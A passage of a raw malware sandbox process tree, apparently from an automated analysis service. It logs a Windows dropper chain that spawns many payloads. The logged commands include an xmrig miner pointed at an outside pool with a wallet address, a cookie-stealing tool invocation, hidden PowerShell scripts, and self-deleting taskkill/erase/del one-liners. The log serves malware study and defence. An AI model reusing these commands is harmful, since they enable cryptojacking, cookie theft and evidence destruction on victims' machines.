C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ywxqz00.1zq\GcleanerWW.exe /mixone & exit14⤵PID:9724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fpbzrcz5.esw\SunLabsPlayer.exe /S & exit14⤵PID:6956
-
C:\Users\Admin\AppData\Local\Temp\fpbzrcz5.esw\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\fpbzrcz5.esw\SunLabsPlayer.exe /S15⤵PID:2488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscACE8.tmp\tempfile.ps1"16⤵PID:9896
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bofqxrm5.msf\005.exe & exit14⤵PID:9984
-
C:\Users\Admin\AppData\Local\Temp\bofqxrm5.msf\005.exeC:\Users\Admin\AppData\Local\Temp\bofqxrm5.msf\005.exe15⤵PID:8632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h13ru4r4.y1x\Setup3310.exe /Verysilent /subid=623 & exit14⤵PID:8588
-
C:\Users\Admin\AppData\Local\Temp\h13ru4r4.y1x\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\h13ru4r4.y1x\Setup3310.exe /Verysilent /subid=62315⤵PID:6792
-
C:\Users\Admin\AppData\Local\Temp\is-JKOJJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-JKOJJ.tmp\Setup3310.tmp" /SL5="$30790,138429,56832,C:\Users\Admin\AppData\Local\Temp\h13ru4r4.y1x\Setup3310.exe" /Verysilent /subid=62316⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\is-M24KJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M24KJ.tmp\Setup.exe" /Verysilent17⤵PID:9588
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"10⤵PID:7712
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe11⤵PID:5828
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe11⤵PID:5512
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe11⤵PID:6764
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"10⤵PID:7208
-
C:\Users\Admin\AppData\Roaming\9ZfPQb9TvU1krcAkmmIjIKQS.exe"C:\Users\Admin\AppData\Roaming\9ZfPQb9TvU1krcAkmmIjIKQS.exe"11⤵PID:7568
-
-
C:\Users\Admin\AppData\Roaming\0IL30wlXZgaJcXvj740MK7IW.exe"C:\Users\Admin\AppData\Roaming\0IL30wlXZgaJcXvj740MK7IW.exe"11⤵PID:4704
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\03938203472.exe"12⤵PID:6588
-
C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\03938203472.exe"C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\03938203472.exe"13⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\03938203472.exe"C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\03938203472.exe"14⤵PID:8892
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\58795498700.exe" /mix12⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\58795498700.exe"C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\58795498700.exe" /mix13⤵PID:8540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 84414⤵
- Program crash
PID:8512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 86814⤵
- Program crash
PID:9312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 90414⤵
- Program crash
PID:9756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 91614⤵
- Program crash
PID:7728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 82014⤵
- Program crash
PID:9908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 89214⤵
- Program crash
PID:9816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 94814⤵
- Program crash
PID:9144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\LjsIKhtVRN & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\58795498700.exe"14⤵PID:372
-
C:\Windows\SysWOW64\timeout.exetimeout 315⤵
- Delays execution with timeout.exe
PID:8396
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\62287678349.exe" /mix12⤵PID:8924
-
C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\62287678349.exe"C:\Users\Admin\AppData\Local\Temp\{ULIh-EI6OR-8qJU-y3LKq}\62287678349.exe" /mix13⤵PID:8880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8880 -s 75614⤵
- Program crash
PID:9468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8880 -s 77214⤵
- Program crash
PID:9964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8880 -s 136014⤵
- Program crash
PID:7880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8880 -s 155214⤵
- Program crash
PID:9920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8880 -s 152014⤵
- Program crash
PID:7252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8880 -s 155214⤵
- Program crash
PID:7060
-
-
C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exeedspolishpp.exe14⤵PID:6764
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "0IL30wlXZgaJcXvj740MK7IW.exe" /f & erase "C:\Users\Admin\AppData\Roaming\0IL30wlXZgaJcXvj740MK7IW.exe" & exit12⤵PID:5512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "0IL30wlXZgaJcXvj740MK7IW.exe" /f13⤵
- Kills process with taskkill
PID:8084
-
-
-
-
C:\Users\Admin\AppData\Roaming\hFHWjEezJMZHPFc9tdLLB1HO.exe"C:\Users\Admin\AppData\Roaming\hFHWjEezJMZHPFc9tdLLB1HO.exe"11⤵PID:4152
-
-
C:\Users\Admin\AppData\Roaming\c1dqw7Vq72eAcRfGDgIaurUd.exe"C:\Users\Admin\AppData\Roaming\c1dqw7Vq72eAcRfGDgIaurUd.exe"11⤵PID:6408
-
C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"12⤵PID:7496
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:6636
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2252
-
-
-
C:\Program Files (x86)\Company\NewProduct\setup.exe"C:\Program Files (x86)\Company\NewProduct\setup.exe"12⤵PID:7336
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"12⤵PID:7328
-
-
C:\Program Files (x86)\Company\NewProduct\pwang.exe"C:\Program Files (x86)\Company\NewProduct\pwang.exe"12⤵PID:4616
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install13⤵PID:5364
-
-
-
-
C:\Users\Admin\AppData\Roaming\MCEgEQ3qGeCPQulF2VtDLG83.exe"C:\Users\Admin\AppData\Roaming\MCEgEQ3qGeCPQulF2VtDLG83.exe"11⤵PID:3856
-
-
C:\Users\Admin\AppData\Roaming\wqaZJFaBxjM5QfxGoZgTZG1y.exe"C:\Users\Admin\AppData\Roaming\wqaZJFaBxjM5QfxGoZgTZG1y.exe"11⤵PID:5328
-
-
C:\Users\Admin\AppData\Roaming\1jlNUDI29yVvoPxUBl9Q8nT1.exe"C:\Users\Admin\AppData\Roaming\1jlNUDI29yVvoPxUBl9Q8nT1.exe"11⤵PID:5560
-
C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"12⤵PID:7348
-
-
C:\Program Files (x86)\Company\NewProduct\file4.exe"C:\Program Files (x86)\Company\NewProduct\file4.exe"12⤵PID:8088
-
-
C:\Program Files (x86)\Company\NewProduct\pub02.exe"C:\Program Files (x86)\Company\NewProduct\pub02.exe"12⤵PID:7656
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\pub02.exe"13⤵PID:4152
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 314⤵
- Runs ping.exe
PID:7472
-
-
-
-
C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"12⤵PID:5044
-
C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"13⤵PID:3464
-
-
-
-
C:\Users\Admin\AppData\Roaming\0rJfBJODWlBZ7B19RG6Xjzcy.exe"C:\Users\Admin\AppData\Roaming\0rJfBJODWlBZ7B19RG6Xjzcy.exe"11⤵PID:5076
-
C:\Users\Admin\AppData\Roaming\xmrig.exe"C:\Users\Admin\AppData\Roaming\xmrig.exe" -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls12⤵PID:5292
-
-
-
C:\Users\Admin\AppData\Roaming\q0Ka10QOPuvcjcGCdoxwvw1u.exe"C:\Users\Admin\AppData\Roaming\q0Ka10QOPuvcjcGCdoxwvw1u.exe"11⤵PID:2236
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\58453031844.exe"12⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\58453031844.exe"C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\58453031844.exe"13⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\58453031844.exe"C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\58453031844.exe"14⤵PID:7928
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\18539944691.exe" /mix12⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\18539944691.exe"C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\18539944691.exe" /mix13⤵PID:5996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 60014⤵
- Program crash
PID:9004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 61614⤵
- Program crash
PID:6616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 60014⤵
- Program crash
PID:9404
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\29089151089.exe" /mix12⤵PID:8416
-
C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\29089151089.exe"C:\Users\Admin\AppData\Local\Temp\{TeKU-xG4Vp-oFgJ-ev3kj}\29089151089.exe" /mix13⤵PID:9136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9136 -s 75614⤵
- Program crash
PID:8236
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9136 -s 76814⤵
- Program crash
PID:8236
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9136 -s 120814⤵
- Program crash
PID:9776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9136 -s 144414⤵
- Program crash
PID:10232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9136 -s 157214⤵
- Program crash
PID:8472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9136 -s 141214⤵
- Program crash
PID:9928
-
-
C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exeedspolishpp.exe14⤵PID:8360
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "q0Ka10QOPuvcjcGCdoxwvw1u.exe" /f & erase "C:\Users\Admin\AppData\Roaming\q0Ka10QOPuvcjcGCdoxwvw1u.exe" & exit12⤵PID:8764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "q0Ka10QOPuvcjcGCdoxwvw1u.exe" /f13⤵
- Kills process with taskkill
PID:6452
-
-
-
-
C:\Users\Admin\AppData\Roaming\2fPYoKRErq68HZearDkOz38I.exe"C:\Users\Admin\AppData\Roaming\2fPYoKRErq68HZearDkOz38I.exe"11⤵PID:1508
-
C:\Users\Admin\AppData\Roaming\2fPYoKRErq68HZearDkOz38I.exe"{path}"12⤵PID:8688
-
-
-
C:\Users\Admin\AppData\Roaming\fZFgG6IPzXPLXM10LRmCvUYl.exe"C:\Users\Admin\AppData\Roaming\fZFgG6IPzXPLXM10LRmCvUYl.exe"11⤵PID:7184
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\SunLabsPlayer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\SunLabsPlayer.exe" /S12⤵PID:5592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9DF8.tmp\tempfile.ps1"13⤵PID:7360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9DF8.tmp\tempfile.ps1"13⤵PID:6284
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:6264
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\hnZvkodqylonC6aPYH1EwYPK.exe"C:\Users\Admin\AppData\Roaming\hnZvkodqylonC6aPYH1EwYPK.exe"11⤵PID:6296
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:7576
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:7220
-
-
-
C:\Users\Admin\AppData\Roaming\aF6F3hs39ZV8oxtVnA5jcKPj.exe"C:\Users\Admin\AppData\Roaming\aF6F3hs39ZV8oxtVnA5jcKPj.exe"11⤵PID:7628
-
-
C:\Users\Admin\AppData\Roaming\ugCdlhLFELtY0dgAEBcqhqzW.exe"C:\Users\Admin\AppData\Roaming\ugCdlhLFELtY0dgAEBcqhqzW.exe"11⤵PID:6304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "1_4924807894722937236.exe" /f & erase "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe" & exit11⤵PID:6996
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Loads dropped DLL
PID:5680
-
-
C:\Windows\system32\taskkill.exetaskkill /im "1_4924807894722937236.exe" /f12⤵
- Kills process with taskkill
PID:5736
-
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"10⤵PID:7844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe11⤵PID:5176
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe12⤵
- Kills process with taskkill
PID:5928
-
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"10⤵PID:6192
-
C:\Users\Admin\AppData\Roaming\6351192.exe"C:\Users\Admin\AppData\Roaming\6351192.exe"11⤵PID:848
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"12⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Roaming\2173042.exe"C:\Users\Admin\AppData\Roaming\2173042.exe"11⤵PID:6200
-
-
C:\Users\Admin\AppData\Roaming\2835315.exe"C:\Users\Admin\AppData\Roaming\2835315.exe"11⤵PID:6052
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"10⤵PID:5452
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"10⤵PID:6668
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install11⤵PID:3148
-
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"10⤵PID:6600
-
-
C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"10⤵PID:5964
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit11⤵PID:7648
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f12⤵
- Kills process with taskkill
PID:5052
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 612⤵
- Delays execution with timeout.exe
PID:8632
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL3⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
PID:4720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5116
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:7532 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:7896
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:6520
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4000
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3056
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4664
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3984
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4628
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7224
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:7964 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 705DC50800BE12F46C039ADEA5294E04 C2⤵
- Loads dropped DLL
PID:6184
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D9E1F0639D6F0F58565CE8124535A8E42⤵PID:5680
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:5980
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6B4EABAC2A92C97A62EDEE26B31725F2 E Global\MSI00002⤵
- Loads dropped DLL
PID:8096
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8B225877FCCE1D0FEB7599B4F0AFC4BF C2⤵PID:7776
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6924
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7780
-
C:\Users\Admin\AppData\Local\Temp\is-9LNFB.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-9LNFB.tmp\lylal220.tmp" /SL5="$20496,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"1⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\is-LQPAI.tmp\4_177039.exe"C:\Users\Admin\AppData\Local\Temp\is-LQPAI.tmp\4_177039.exe" /S /UID=lylal2202⤵PID:4928
-
C:\Program Files\VideoLAN\HUMGRFZMPK\irecord.exe"C:\Program Files\VideoLAN\HUMGRFZMPK\irecord.exe" /VERYSILENT3⤵PID:5724
-
C:\Users\Admin\AppData\Local\Temp\is-NIC77.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-NIC77.tmp\irecord.tmp" /SL5="$305AA,6139911,56832,C:\Program Files\VideoLAN\HUMGRFZMPK\irecord.exe" /VERYSILENT4⤵PID:6232
-
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu5⤵PID:7420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d4-0104b-9e8-35682-34b6ba5ac545d\Fuvaenedefi.exe"C:\Users\Admin\AppData\Local\Temp\d4-0104b-9e8-35682-34b6ba5ac545d\Fuvaenedefi.exe"3⤵PID:7932
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hoyzgvhn.hnk\sskiper.exe /s & exit4⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\hoyzgvhn.hnk\sskiper.exeC:\Users\Admin\AppData\Local\Temp\hoyzgvhn.hnk\sskiper.exe /s5⤵PID:8576
-
C:\Users\Admin\AppData\Local\Temp\1620954968.exeC:\Users\Admin\AppData\Local\Temp\1620954968.exe6⤵PID:9328
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe7⤵PID:6280
-
-
-
C:\Users\Admin\AppData\Local\Temp\146704623.exeC:\Users\Admin\AppData\Local\Temp\146704623.exe6⤵PID:9644
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\homfokrq.3rt\KiffMainE1.exe & exit4⤵PID:6100
-
